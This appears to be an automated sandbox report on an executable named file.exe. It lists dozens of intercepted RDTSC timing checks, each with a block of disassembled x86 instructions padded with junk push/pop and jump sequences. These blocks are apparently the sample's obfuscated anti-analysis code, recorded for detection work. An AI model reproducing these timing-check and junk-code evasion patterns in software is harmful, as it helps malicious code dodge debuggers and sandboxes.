Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70CC1 second address: 4A70CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70CC7 second address: 4A70CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70651 second address: 4A706DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA67D0802A7h 0x00000009 adc ecx, 54338A3Eh 0x0000000f jmp 00007FA67D0802A9h 0x00000014 popfd 0x00000015 mov ebx, eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov dl, 77h 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov eax, 1550B713h 0x00000027 push esi 0x00000028 mov cx, di 0x0000002b pop ebx 0x0000002c popad 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FA67D0802A3h 0x00000037 adc eax, 623A49AEh 0x0000003d jmp 00007FA67D0802A9h 0x00000042 popfd 0x00000043 push esi 0x00000044 pop edi 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A706DF second address: 4A706E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A706E5 second address: 4A706E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70384 second address: 4A703D3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA67C81A86Bh 0x00000008 jmp 00007FA67C81A873h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007FA67C81A879h 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA67C81A86Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A703D3 second address: 4A70406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA67D0802A8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70406 second address: 4A70415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A86Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70415 second address: 4A7041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A8030B second address: 4A8031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA67C81A86Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A8031B second address: 4A8031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0429 second address: 4AC04C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov bx, 7BB0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA67C81A872h 0x00000014 xor esi, 2CEA3BF8h 0x0000001a jmp 00007FA67C81A86Bh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FA67C81A878h 0x00000026 jmp 00007FA67C81A875h 0x0000002b popfd 0x0000002c popad 0x0000002d mov dword ptr [esp], ebp 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FA67C81A86Ch 0x00000037 sbb cx, A0B8h 0x0000003c jmp 00007FA67C81A86Bh 0x00000041 popfd 0x00000042 mov cx, 20EFh 0x00000046 popad 0x00000047 mov ebp, esp 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FA67C81A871h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A90617 second address: 4A9061B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A9061B second address: 4A90621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A90621 second address: 4A9066F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA67D08029Ch 0x00000009 or eax, 54D640B8h 0x0000000f jmp 00007FA67D08029Bh 0x00000014 popfd 0x00000015 call 00007FA67D0802A8h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FA67D08029Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A9066F second address: 4A90675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A90675 second address: 4A90679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A90679 second address: 4A9068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A9068C second address: 4A906A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3A8AAB9Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA67D08029Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A7053C second address: 4A70595 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA67C81A86Ah 0x00000008 adc cx, A108h 0x0000000d jmp 00007FA67C81A86Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007FA67C81A879h 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e mov al, 6Ch 0x00000020 mov ebx, 0B732BACh 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 jmp 00007FA67C81A86Bh 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70595 second address: 4A705B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A9027C second address: 4A90282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A90488 second address: 4A9048C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A9048C second address: 4A90492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A90492 second address: 4A90498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A90498 second address: 4A9049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A9049C second address: 4A904EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ah, FEh 0x0000000c mov eax, edx 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FA67D08029Eh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FA67D0802A0h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov si, 415Dh 0x00000022 mov ecx, 6ABD9659h 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA67D08029Eh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A904EB second address: 4A904EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A904EF second address: 4A904F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A904F5 second address: 4A904FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB083B second address: 4AB085C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4E74A7D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov edi, esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA67D08029Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB085C second address: 4AB0862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0862 second address: 4AB0866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0866 second address: 4AB0897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FA67C81A86Fh 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA67C81A875h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0897 second address: 4AB08BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA67D08029Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB08BC second address: 4AB08C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB08C2 second address: 4AB08C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB08C6 second address: 4AB0918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FA67C81A874h 0x0000000f pushfd 0x00000010 jmp 00007FA67C81A872h 0x00000015 jmp 00007FA67C81A875h 0x0000001a popfd 0x0000001b pop eax 0x0000001c mov cl, bl 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0918 second address: 4AB091C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB091C second address: 4AB0922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0922 second address: 4AB094C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, cl 0x00000005 mov edi, 3E45E55Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [76FB65FCh] 0x00000012 jmp 00007FA67D0802A1h 0x00000017 test eax, eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB094C second address: 4AB0956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 5765D0DCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0956 second address: 4AB09A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA6EF503290h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, cx 0x00000015 pushfd 0x00000016 jmp 00007FA67D0802A6h 0x0000001b sub ecx, 67F1A458h 0x00000021 jmp 00007FA67D08029Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB09A2 second address: 4AB0A14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007FA67C81A86Eh 0x00000010 xor eax, dword ptr [ebp+08h] 0x00000013 jmp 00007FA67C81A871h 0x00000018 and ecx, 1Fh 0x0000001b pushad 0x0000001c push eax 0x0000001d mov dh, 85h 0x0000001f pop eax 0x00000020 call 00007FA67C81A875h 0x00000025 mov ecx, 625C4BB7h 0x0000002a pop eax 0x0000002b popad 0x0000002c ror eax, cl 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push esi 0x00000032 pop edx 0x00000033 mov esi, 74E190A7h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0A14 second address: 4AB0A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0A19 second address: 4AB0A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 leave 0x00000008 jmp 00007FA67C81A872h 0x0000000d retn 0004h 0x00000010 nop 0x00000011 mov esi, eax 0x00000013 lea eax, dword ptr [ebp-08h] 0x00000016 xor esi, dword ptr [006B2014h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push eax 0x0000001f lea eax, dword ptr [ebp-10h] 0x00000022 push eax 0x00000023 call 00007FA680C5B1DCh 0x00000028 push FFFFFFFEh 0x0000002a pushad 0x0000002b pushad 0x0000002c jmp 00007FA67C81A86Ch 0x00000031 mov ch, 30h 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 mov dx, D650h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB0A4F second address: 4AB0AC5 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop eax 0x00000009 jmp 00007FA67D0802A0h 0x0000000e ret 0x0000000f nop 0x00000010 push eax 0x00000011 call 00007FA6814C0C38h 0x00000016 mov edi, edi 0x00000018 jmp 00007FA67D0802A0h 0x0000001d xchg eax, ebp 0x0000001e jmp 00007FA67D0802A0h 0x00000023 push eax 0x00000024 jmp 00007FA67D08029Bh 0x00000029 xchg eax, ebp 0x0000002a pushad 0x0000002b call 00007FA67D0802A4h 0x00000030 call 00007FA67D0802A2h 0x00000035 pop esi 0x00000036 pop edx 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60071 second address: 4A60123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FA67C81A86Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov edx, 69EBFB14h 0x00000016 jmp 00007FA67C81A86Dh 0x0000001b popad 0x0000001c xchg eax, ecx 0x0000001d jmp 00007FA67C81A86Eh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FA67C81A86Eh 0x0000002a add ah, FFFFFFF8h 0x0000002d jmp 00007FA67C81A86Bh 0x00000032 popfd 0x00000033 mov dh, cl 0x00000035 popad 0x00000036 push eax 0x00000037 jmp 00007FA67C81A872h 0x0000003c xchg eax, ebx 0x0000003d jmp 00007FA67C81A870h 0x00000042 mov ebx, dword ptr [ebp+10h] 0x00000045 jmp 00007FA67C81A870h 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c mov bh, al 0x0000004e push eax 0x0000004f push edx 0x00000050 push edi 0x00000051 pop eax 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60123 second address: 4A60139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA67D08029Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60139 second address: 4A6013F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A6013F second address: 4A60145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60145 second address: 4A6019F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FA67C81A86Dh 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FA67C81A871h 0x0000001b and si, A816h 0x00000020 jmp 00007FA67C81A871h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A6019F second address: 4A601C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C552h 0x00000007 movsx ebx, ax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, dword ptr [ebp+08h] 0x00000010 jmp 00007FA67D0802A2h 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 mov cl, 76h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A601C8 second address: 4A601D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A601D7 second address: 4A60238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D08029Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA67D08029Bh 0x00000013 xor ah, 0000000Eh 0x00000016 jmp 00007FA67D0802A9h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FA67D0802A0h 0x00000022 and al, FFFFFF88h 0x00000025 jmp 00007FA67D08029Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60238 second address: 4A60250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA67C81A874h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60250 second address: 4A602BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D08029Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA67D0802A4h 0x00000014 add ch, 00000048h 0x00000017 jmp 00007FA67D08029Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FA67D0802A8h 0x00000023 or al, FFFFFFA8h 0x00000026 jmp 00007FA67D08029Bh 0x0000002b popfd 0x0000002c popad 0x0000002d je 00007FA6EF54E5FAh 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A602BD second address: 4A602C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A602C1 second address: 4A602C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A602C7 second address: 4A602E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA67C81A86Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A602E3 second address: 4A602EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A602EA second address: 4A60366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007FA6EECE8BA0h 0x0000000d jmp 00007FA67C81A879h 0x00000012 mov edx, dword ptr [esi+44h] 0x00000015 pushad 0x00000016 pushad 0x00000017 mov edi, eax 0x00000019 call 00007FA67C81A876h 0x0000001e pop eax 0x0000001f popad 0x00000020 mov bh, C7h 0x00000022 popad 0x00000023 or edx, dword ptr [ebp+0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b pushfd 0x0000002c jmp 00007FA67C81A875h 0x00000031 add cl, FFFFFF96h 0x00000034 jmp 00007FA67C81A871h 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60366 second address: 4A603D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 call 00007FA67D0802A3h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test edx, 61000000h 0x00000014 jmp 00007FA67D08029Fh 0x00000019 jne 00007FA6EF54E587h 0x0000001f jmp 00007FA67D0802A6h 0x00000024 test byte ptr [esi+48h], 00000001h 0x00000028 jmp 00007FA67D0802A0h 0x0000002d jne 00007FA6EF54E570h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A603D3 second address: 4A603D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A603D7 second address: 4A603DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A603DD second address: 4A603E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A603E3 second address: 4A60409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA67D0802A9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A5081D second address: 4A50821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50821 second address: 4A50836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50836 second address: 4A508C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA67C81A877h 0x00000009 adc esi, 79F24DBEh 0x0000000f jmp 00007FA67C81A879h 0x00000014 popfd 0x00000015 call 00007FA67C81A870h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FA67C81A86Ch 0x00000026 sub si, 5DE8h 0x0000002b jmp 00007FA67C81A86Bh 0x00000030 popfd 0x00000031 mov ebx, ecx 0x00000033 popad 0x00000034 mov dword ptr [esp], ebp 0x00000037 jmp 00007FA67C81A872h 0x0000003c mov ebp, esp 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A508C5 second address: 4A508C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A508C9 second address: 4A508CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
